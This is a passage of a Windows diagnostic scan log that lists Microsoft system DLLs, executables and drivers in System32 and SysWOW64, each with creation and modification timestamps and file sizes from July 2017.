2017-07-11 20:54 - 2017-06-20 06:41 - 000201216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\credprovhost.dll
2017-07-11 20:54 - 2017-06-20 06:40 - 000368128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgentUserBroker.exe
2017-07-11 20:54 - 2017-06-20 06:40 - 000356864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ActivationManager.dll
2017-07-11 20:54 - 2017-06-20 06:40 - 000342016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\certcli.dll
2017-07-11 20:54 - 2017-06-20 06:40 - 000247808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AboveLockAppHost.dll
2017-07-11 20:54 - 2017-06-20 06:40 - 000230912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edputil.dll
2017-07-11 20:54 - 2017-06-20 06:40 - 000038400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBrokerUI.dll
2017-07-11 20:54 - 2017-06-20 06:39 - 002814464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\themeui.dll
2017-07-11 20:54 - 2017-06-20 06:39 - 002671616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tquery.dll
2017-07-11 20:54 - 2017-06-20 06:39 - 000969728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Unistore.dll
2017-07-11 20:54 - 2017-06-20 06:39 - 000646144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mmsys.cpl
2017-07-11 20:54 - 2017-06-20 06:39 - 000471040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VAN.dll
2017-07-11 20:54 - 2017-06-20 06:39 - 000312320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchProtocolHost.exe
2017-07-11 20:54 - 2017-06-20 06:38 - 001451008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIAutomationCore.dll
2017-07-11 20:54 - 2017-06-20 06:38 - 001285120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbghelp.dll
2017-07-11 20:54 - 2017-06-20 06:38 - 001171968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\certutil.exe
2017-07-11 20:54 - 2017-06-20 06:38 - 000663040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
2017-07-11 20:54 - 2017-06-20 06:38 - 000648192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SmartcardCredentialProvider.dll
2017-07-11 20:54 - 2017-06-20 06:38 - 000329728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe
2017-07-11 20:54 - 2017-06-20 06:37 - 002008576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
2017-07-11 20:54 - 2017-06-20 06:36 - 003667456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_47.dll
2017-07-11 20:54 - 2017-06-20 06:35 - 002679296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SRH.dll
2017-07-11 20:54 - 2017-06-20 06:35 - 002132480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssrch.dll
2017-07-11 20:54 - 2017-06-20 06:35 - 000050176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cldapi.dll
2017-07-11 20:54 - 2017-06-20 06:34 - 004056576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFMediaEngine.dll
2017-07-11 20:54 - 2017-06-20 06:34 - 002750464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CertEnroll.dll
2017-07-11 20:54 - 2017-06-20 06:34 - 002211328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputService.dll
2017-07-11 20:54 - 2017-06-20 06:34 - 001492480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Bluetooth.dll
2017-07-11 20:54 - 2017-06-20 06:34 - 000760832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasapi32.dll
2017-07-11 20:54 - 2017-06-20 06:31 - 000334848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToDevice.dll
2017-07-11 20:54 - 2017-06-20 06:30 - 000209920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wdmaud.drv
2017-07-11 20:54 - 2017-06-20 06:30 - 000157696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rpchttp.dll
2017-07-11 20:54 - 2017-06-20 06:30 - 000089088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll
2017-07-11 20:54 - 2017-06-20 06:28 - 000584192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\apphelp.dll
2017-07-11 20:53 - 2017-07-07 09:27 - 001147288 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe
2017-07-11 20:53 - 2017-07-07 09:27 - 001024928 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe
2017-07-11 20:53 - 2017-07-07 09:27 - 000965024 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.efi
2017-07-11 20:53 - 2017-07-07 09:27 - 000821664 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.exe
2017-07-11 20:53 - 2017-07-07 09:27 - 000750560 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2017-07-11 20:53 - 2017-07-07 09:26 - 001065104 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2017-07-11 20:53 - 2017-07-07 09:25 - 000899824 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2017-07-11 20:53 - 2017-07-07 09:22 - 008318880 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2017-07-11 20:53 - 2017-07-07 09:22 - 001186464 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2017-07-11 20:53 - 2017-07-07 09:22 - 000119384 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmcmnutils.dll
2017-07-11 20:53 - 2017-07-07 09:21 - 002969880 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreUIComponents.dll
2017-07-11 20:53 - 2017-07-07 09:20 - 000923040 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreMessaging.dll
2017-07-11 20:53 - 2017-07-07 09:20 - 000382368 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\clfs.sys
2017-07-11 20:53 - 2017-07-07 09:17 - 001017760 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi
2017-07-11 20:53 - 2017-07-07 09:15 - 002444696 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2017-07-11 20:53 - 2017-07-07 09:14 - 007325584 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll
2017-07-11 20:53 - 2017-07-07 09:14 - 005477088 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneCoreUAPCommonProxyStub.dll
2017-07-11 20:53 - 2017-07-07 09:14 - 001760264 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecs.dll
2017-07-11 20:53 - 2017-07-07 09:14 - 001171032 _____ (Microsoft Corporation) C:\WINDOWS\system32\dcomp.dll
2017-07-11 20:53 - 2017-07-07 09:13 - 000872472 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipSVC.dll
2017-07-11 20:53 - 2017-07-07 09:13 - 000147800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Clipc.dll
2017-07-11 20:53 - 2017-07-07 09:12 - 000411040 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
2017-07-11 20:53 - 2017-07-07 09:12 - 000318232 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininit.exe
2017-07-11 20:53 - 2017-07-07 09:12 - 000228256 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb20.sys
2017-07-11 20:53 - 2017-07-07 09:11 - 007904784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2017-07-11 20:53 - 2017-07-07 09:10 - 021353208 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2017-07-11 20:53 - 2017-07-07 09:10 - 001337848 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEng.dll
2017-07-11 20:53 - 2017-07-07 09:10 - 000372128 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHost.dll
2017-07-11 20:53 - 2017-07-07 09:09 - 000041376 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininitext.dll
2017-07-11 20:53 - 2017-07-07 08:27 - 003670016 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2017-07-11 20:53 - 2017-07-07 08:27 - 001640448 _____ (Microsoft Corporation) C:\WINDOWS\system32\GdiPlus.dll
2017-07-11 20:53 - 2017-07-07 08:27 - 001050624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.dll
2017-07-11 20:53 - 2017-07-07 08:27 - 000859136 _____ (Microsoft Corporation) C:\WINDOWS\system32\uDWM.dll
2017-07-11 20:53 - 2017-07-07 08:27 - 000577024 _____ (Microsoft Corporation) C:\WINDOWS\system32\duser.dll
2017-07-11 20:53 - 2017-07-07 08:27 - 000443392 _____ (Microsoft Corporation) C:\WINDOWS\system32\PerceptionSimulationExtensions.dll
2017-07-11 20:53 - 2017-07-07 08:27 - 000360960 _____ (Microsoft Corporation) C:\WINDOWS\system32\ConhostV2.dll
2017-07-11 20:53 - 2017-07-07 08:26 - 017364992 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll
2017-07-11 20:53 - 2017-07-07 08:25 - 002199552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Resources.dll
2017-07-11 20:53 - 2017-07-07 08:24 - 000114688 _____ (Microsoft Corporation) C:\WINDOWS\system32\officecsp.dll
2017-07-11 20:53 - 2017-07-07 08:23 - 000113152 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhosdeployment.dll
2017-07-11 20:53 - 2017-07-07 08:23 - 000029696 _____ (Microsoft Corporation) C:\WINDOWS\system32\eapprovp.dll
2017-07-11 20:53 - 2017-07-07 08:22 - 007931392 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2017-07-11 20:53 - 2017-07-07 08:22 - 000520704 _____ (Microsoft Corporation) C:\WINDOWS\system32\daxexec.dll
2017-07-11 20:53 - 2017-07-07 08:21 - 000096256 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActiveSyncCsp.dll
2017-07-11 20:53 - 2017-07-07 08:21 - 000064512 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrv.dll
2017-07-11 20:53 - 2017-07-07 08:19 - 000527360 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadcloudap.dll
2017-07-11 20:53 - 2017-07-07 08:19 - 000256000 _____ (Microsoft Corporation) C:\WINDOWS\system32\domgmt.dll
2017-07-11 20:53 - 2017-07-07 08:19 - 000137216 _____ (Microsoft Corporation) C:\WINDOWS\system32\raschap.dll
2017-07-11 20:53 - 2017-07-07 08:18 - 007336448 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2017-07-11 20:53 - 2017-07-07 08:18 - 000563712 _____ (Microsoft Corporation) C:\WINDOWS\system32\DevicePairing.dll
2017-07-11 20:53 - 2017-07-07 08:18 - 000353280 _____ (Microsoft Corporation) C:\WINDOWS\system32\Wldap32.dll
2017-07-11 20:53 - 2017-07-07 08:18 - 000274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecsExt.dll
2017-07-11 20:53 - 2017-07-07 08:17 - 001878016 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll
2017-07-11 20:53 - 2017-07-07 08:17 - 001260544 _____ (Microsoft Corporation) C:\WINDOWS\system32\GamePanel.exe
2017-07-11 20:53 - 2017-07-07 08:17 - 000536064 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Management.dll
2017-07-11 20:53 - 2017-07-07 08:17 - 000229888 _____ (Microsoft Corporation) C:\WINDOWS\system32\SIHClient.exe
2017-07-11 20:53 - 2017-07-07 08:16 - 000925696 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcWebFilter.dll
2017-07-11 20:53 - 2017-07-07 08:15 - 000922112 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2017-07-11 20:53 - 2017-07-07 08:14 - 001802240 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2017-07-11 20:53 - 2017-07-07 08:14 - 000497152 _____ (Microsoft Corporation) C:\WINDOWS\system32\rastls.dll
2017-07-11 20:53 - 2017-07-07 08:13 - 005892096 _____ (Microsoft Corporation) C:\WINDOWS\system32\d2d1.dll
2017-07-11 20:53 - 2017-07-07 08:13 - 000840192 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll
2017-07-11 20:53 - 2017-07-07 08:12 - 003307008 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2017-07-11 20:53 - 2017-07-07 08:12 - 002499584 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.pcshell.dll
2017-07-11 20:53 - 2017-07-07 08:12 - 002055168 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2017-07-11 20:53 - 2017-07-07 08:12 - 001713664 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActiveSyncProvider.dll
2017-07-11 20:53 - 2017-07-07 08:12 - 001420800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Maps.dll
2017-07-11 20:53 - 2017-07-07 08:12 - 001305088 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll
2017-07-11 20:53 - 2017-07-07 08:12 - 001293824 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll
2017-07-11 20:53 - 2017-07-07 08:11 - 003139584 _____ (Microsoft Corporation) C:\WINDOWS\system32\msftedit.dll
2017-07-11 20:53 - 2017-07-07 08:11 - 002829824 _____ (Microsoft Corporation) C:\WINDOWS\system32\DWrite.dll
2017-07-11 20:53 - 2017-07-07 08:11 - 002649600 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2017-07-11 20:53 - 2017-07-07 08:11 - 002177024 _____ (Microsoft Corporation) C:\WINDOWS\system32\OpcServices.dll
2017-07-11 20:53 - 2017-07-07 08:11 - 001888256 _____ (Microsoft Corporation) C:\WINDOWS\system32\FntCache.dll
2017-07-11 20:53 - 2017-07-07 08:11 - 000986112 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
2017-07-11 20:53 - 2017-07-07 08:11 - 000406528 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll
2017-07-11 20:53 - 2017-07-07 08:10 - 005557760 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbgeng.dll
2017-07-11 20:53 - 2017-07-07 08:10 - 004707840 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExplorerFrame.dll
2017-07-11 20:53 - 2017-07-07 08:10 - 002444288 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2017-07-11 20:53 - 2017-07-07 08:07 - 000430080 _____ (Microsoft Corporation) C:\WINDOWS\system32\PlayToDevice.dll
2017-07-11 20:53 - 2017-07-07 08:07 - 000391168 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMPhoto.dll
2017-07-11 20:53 - 2017-07-07 08:05 - 000370176 _____ (Microsoft Corporation) C:\WINDOWS\system32\msinfo32.exe
2017-07-11 20:53 - 2017-07-07 08:04 - 001703424 _____ (Microsoft Corporation) C:\WINDOWS\system32\aitstatic.exe
2017-07-11 20:53 - 2017-07-07 08:04 - 001403392 _____ (Microsoft Corporation) C:\WINDOWS\system32\wdc.dll
2017-07-11 20:53 - 2017-07-07 08:04 - 000058368 _____ (Microsoft Corporation) C:\WINDOWS\system32\csrsrv.dll
2017-07-11 20:53 - 2017-07-02 00:52 - 000031932 _____ C:\WINDOWS\system32\edgehtmlpluginpolicy.bin
2017-07-11 20:53 - 2017-06-20 08:18 - 001564576 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2017-07-11 20:53 - 2017-06-20 08:18 - 000096672 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe
2017-07-11 20:53 - 2017-06-20 08:17 - 000629152 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
2017-07-11 20:53 - 2017-06-20 08:17 - 000544160 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
2017-07-11 20:53 - 2017-06-20 08:17 - 000334240 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
2017-07-11 20:53 - 2017-06-20 08:17 - 000136096 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll
2017-07-11 20:53 - 2017-06-20 08:17 - 000034720 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceCensus.exe
2017-07-11 20:53 - 2017-06-20 08:16 - 001214880 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2017-07-11 20:53 - 2017-06-20 08:16 - 000335776 _____ (Microsoft Corporation) C:\WINDOWS\system32\dcntel.dll
2017-07-11 20:53 - 2017-06-20 08:15 - 000233376 _____ (Microsoft Corporation) C:\WINDOWS\system32\aepic.dll
2017-07-11 20:53 - 2017-06-20 08:11 - 001395152 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2017-07-11 20:53 - 2017-06-20 08:10 - 002327456 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys
2017-07-11 20:53 - 2017-06-20 08:10 - 001930320 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2017-07-11 20:53 - 2017-06-20 08:05 - 001057832 _____ (Microsoft Corporation) C:\WINDOWS\system32\MrmCoreR.dll
2017-07-11 20:53 - 2017-06-20 08:04 - 004847424 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2017-07-11 20:53 - 2017-06-20 08:04 - 000472728 _____ (Microsoft Corporation) C:\WINDOWS\system32\policymanager.dll
2017-07-11 20:53 - 2017-06-20 08:03 - 000179608 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostUser.dll
2017-07-11 20:53 - 2017-06-20 08:03 - 000102312 _____ (Microsoft Corporation) C:\WINDOWS\system32\CredentialUIBroker.exe
2017-07-11 20:53 - 2017-06-20 08:02 - 002645688 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2017-07-11 20:53 - 2017-06-20 08:02 - 000426912 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostCommon.dll
2017-07-11 20:53 - 2017-06-20 08:00 - 000558920 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.dll
2017-07-11 20:53 - 2017-06-20 08:00 - 000255904 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxAllUserStore.dll
2017-07-11 20:53 - 2017-06-20 08:00 - 000142752 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wcifs.sys
2017-07-11 20:53 - 2017-06-20 07:59 - 001054280 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll
2017-07-11 20:53 - 2017-06-20 07:59 - 000583304 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiodg.exe
2017-07-11 20:53 - 2017-06-20 07:58 - 000833160 _____ (Microsoft Corporation) C:\WINDOWS\system32\EditionUpgradeManagerObj.dll
2017-07-11 20:53 - 2017-06-20 07:58 - 000406072 _____ (Microsoft Corporation) C:\WINDOWS\system32\MMDevAPI.dll
2017-07-11 20:53 - 2017-06-20 07:58 - 000203168 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostBroker.dll
2017-07-11 20:53 - 2017-06-20 07:57 - 000204192 _____ (Microsoft Corporation) C:\WINDOWS\system32\basecsp.dll
2017-07-11 20:53 - 2017-06-20 07:16 - 000970752 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctfuimanager.dll
2017-07-11 20:53 - 2017-06-20 07:16 - 000417280 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleacc.dll
2017-07-11 20:53 - 2017-06-20 07:15 - 001620368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
2017-07-11 20:53 - 2017-06-20 07:14 - 001150784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ucrtbase.dll
2017-07-11 20:53 - 2017-06-20 07:14 - 000032768 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mskssrv.sys
2017-07-11 20:53 - 2017-06-20 07:13 - 000216064 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft.Bluetooth.Profiles.Gatt.Interface.dll
2017-07-11 20:53 - 2017-06-20 07:13 - 000081408 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwanprotdim.dll
2017-07-11 20:53 - 2017-06-20 07:13 - 000064000 _____ (Microsoft Corporation) C:\WINDOWS\system32\WFDSConMgr.dll
2017-07-11 20:53 - 2017-06-20 07:12 - 000231936 _____ (Microsoft Corporation) C:\WINDOWS\system32\DolbyMATEnc.dll
2017-07-11 20:53 - 2017-06-20 07:12 - 000144384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.System.Profile.RetailInfo.dll
2017-07-11 20:53 - 2017-06-20 07:11 - 000200192 _____ (Microsoft Corporation) C:\WINDOWS\system32\ScDeviceEnum.dll
2017-07-11 20:53 - 2017-06-20 07:10 - 000778240 _____ (Microsoft Corporation) C:\WINDOWS\system32\DolbyHrtfEnc.dll
2017-07-11 20:53 - 2017-06-20 07:10 - 000315392 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsEnvironment.Desktop.dll
2017-07-11 20:53 - 2017-06-20 07:10 - 000189440 _____ (Microsoft Corporation) C:\WINDOWS\system32\BluetoothApis.dll
2017-07-11 20:53 - 2017-06-20 07:10 - 000188928 _____ (Microsoft Corporation) C:\WINDOWS\system32\wincredui.dll
2017-07-11 20:53 - 2017-06-20 07:09 - 000555008 _____ (Microsoft Corporation) C:\WINDOWS\system32\WFDSConMgrSvc.dll
2017-07-11 20:53 - 2017-06-20 07:09 - 000497152 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Shell.BlueLightReduction.dll
2017-07-11 20:53 - 2017-06-20 07:09 - 000427008 _____ (Microsoft Corporation) C:\WINDOWS\system32\provengine.dll
2017-07-11 20:53 - 2017-06-20 07:09 - 000250368 _____ (Microsoft Corporation) C:\WINDOWS\system32\SCardSvr.dll
2017-07-11 20:53 - 2017-06-20 07:09 - 000208384 _____ (Microsoft Corporation) C:\WINDOWS\system32\psmsrv.dll
2017-07-11 20:53 - 2017-06-20 07:09 - 000205312 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipboardServer.dll
2017-07-11 20:53 - 2017-06-20 07:09 - 000189952 _____ (Microsoft Corporation) C:\WINDOWS\system32\certprop.dll
2017-07-11 20:53 - 2017-06-20 07:09 - 000135680 _____ (Microsoft Corporation) C:\WINDOWS\system32\sendmail.dll
2017-07-11 20:53 - 2017-06-20 07:09 - 000062464 _____ (Microsoft Corporation) C:\WINDOWS\system32\dataclen.dll
2017-07-11 20:53 - 2017-06-20 07:08 - 000791040 _____ (Microsoft Corporation) C:\WINDOWS\system32\certca.dll
2017-07-11 20:53 - 2017-06-20 07:08 - 000365056 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Notifications.dll
2017-07-11 20:53 - 2017-06-20 07:08 - 000251392 _____ (Microsoft Corporation) C:\WINDOWS\system32\scksp.dll
2017-07-11 20:53 - 2017-06-20 07:07 - 000916992 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcastdvr.exe
2017-07-11 20:53 - 2017-06-20 07:07 - 000757248 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WdiWiFi.sys
2017-07-11 20:53 - 2017-06-20 07:07 - 000626176 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Bluetooth.dll
2017-07-11 20:53 - 2017-06-20 07:07 - 000621056 _____ (Microsoft Corporation) C:\WINDOWS\system32\SndVolSSO.dll
2017-07-11 20:53 - 2017-06-20 07:07 - 000411136 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatehandlers.dll
2017-07-11 20:53 - 2017-06-20 07:06 - 000455680 _____ (Microsoft Corporation) C:\WINDOWS\system32\certcli.dll
2017-07-11 20:53 - 2017-06-20 07:06 - 000335872 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudDomainJoinDataModelServer.dll
2017-07-11 20:53 - 2017-06-20 07:06 - 000299520 _____ (Microsoft Corporation) C:\WINDOWS\system32\AboveLockAppHost.dll
2017-07-11 20:53 - 2017-06-20 07:06 - 000253440 _____ (Microsoft Corporation) C:\WINDOWS\system32\edputil.dll
2017-07-11 20:53 - 2017-06-20 07:06 - 000045056 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBrokerUI.dll
2017-07-11 20:53 - 2017-06-20 07:05 - 004447744 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
2017-07-11 20:53 - 2017-06-20 07:05 - 002873344 _____ (Microsoft Corporation) C:\WINDOWS\system32\themeui.dll
2017-07-11 20:53 - 2017-06-20 07:05 - 001468416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2017-07-11 20:53 - 2017-06-20 07:05 - 000873472 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasmans.dll
2017-07-11 20:53 - 2017-06-20 07:05 - 000696320 _____ (Microsoft Corporation) C:\WINDOWS\system32\mmsys.cpl
2017-07-11 20:53 - 2017-06-20 07:05 - 000406528 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputSwitch.dll
2017-07-11 20:53 - 2017-06-20 07:05 - 000056832 _____ (Microsoft Corporation) C:\WINDOWS\system32\cldapi.dll
2017-07-11 20:53 - 2017-06-20 07:04 - 001818624 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIAutomationCore.dll
2017-07-11 20:53 - 2017-06-20 07:04 - 001425920 _____ (Microsoft Corporation) C:\WINDOWS\system32\certutil.exe
2017-07-11 20:53 - 2017-06-20 07:04 - 000899072 _____ (Microsoft Corporation) C:\WINDOWS\system32\SmartcardCredentialProvider.dll
2017-07-11 20:53 - 2017-06-20 07:04 - 000802816 _____ (Microsoft Corporation) C:\WINDOWS\system32\wcmsvc.dll
2017-07-11 20:53 - 2017-06-20 07:04 - 000400896 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXTaskFactory.dll
2017-07-11 20:53 - 2017-06-20 07:04 - 000178176 _____ (Microsoft Corporation) C:\WINDOWS\system32\EditionUpgradeHelper.dll
2017-07-11 20:53 - 2017-06-20 07:03 - 001396224 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwansvc.dll
2017-07-11 20:53 - 2017-06-20 07:02 - 003204096 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft.Bluetooth.Profiles.Gatt.dll
2017-07-11 20:53 - 2017-06-20 07:02 - 002804736 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2017-07-11 20:53 - 2017-06-20 07:02 - 001886208 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2017-07-11 20:53 - 2017-06-20 07:02 - 000681984 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll
2017-07-11 20:53 - 2017-06-20 07:02 - 000081920 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudDomainJoinAUG.dll
2017-07-11 20:53 - 2017-06-20 07:01 - 004396032 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_47.dll
2017-07-11 20:53 - 2017-06-20 07:01 - 003803136 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsThresholdAdminFlowUI.dll
2017-07-11 20:53 - 2017-06-20 07:01 - 003332096 _____ (Microsoft Corporation) C:\WINDOWS\system32\SRH.dll
2017-07-11 20:53 - 2017-06-20 07:01 - 003059200 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkMobileSettings.dll
2017-07-11 20:53 - 2017-06-20 07:01 - 001076736 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.appcore.dll
2017-07-11 20:53 - 2017-06-20 07:01 - 000809984 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasapi32.dll
2017-07-11 20:53 - 2017-06-20 07:01 - 000397312 _____ (Microsoft Corporation) C:\WINDOWS\system32\rascustom.dll
2017-07-11 20:53 - 2017-06-20 07:00 - 003057664 _____ (Microsoft Corporation) C:\WINDOWS\system32\CertEnroll.dll
2017-07-11 20:53 - 2017-06-20 07:00 - 002171392 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Bluetooth.dll
2017-07-11 20:53 - 2017-06-20 06:59 - 001357824 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2017-07-11 20:53 - 2017-06-20 06:58 - 000625152 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2017-07-11 20:53 - 2017-06-20 06:57 - 000290816 _____ (Microsoft Corporation) C:\WINDOWS\system32\omadmclient.exe
2017-07-11 20:53 - 2017-06-20 06:57 - 000138752 _____ (Microsoft Corporation) C:\WINDOWS\system32\DMPushRouterCore.dll
2017-07-11 20:53 - 2017-06-20 06:56 - 000600064 _____ (Microsoft Corporation) C:\WINDOWS\system32\FrameServer.dll
